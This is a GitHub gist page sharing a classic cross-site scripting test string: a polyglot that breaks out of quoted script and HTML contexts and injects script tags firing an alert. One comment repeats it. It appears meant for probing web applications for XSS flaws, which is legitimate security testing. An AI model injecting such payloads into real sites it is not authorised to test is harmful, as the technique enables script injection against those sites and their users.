Skip to content

Instantly share code, notes, and snippets.

@jiromm
Created April 20, 2015 06:03
Show Gist options
  • Save jiromm/d8d321f232d01c42d100 to your computer and use it in GitHub Desktop.
Save jiromm/d8d321f232d01c42d100 to your computer and use it in GitHub Desktop.
XSS testing string
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
@lee101
Copy link

lee101 commented Feb 28, 2019

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment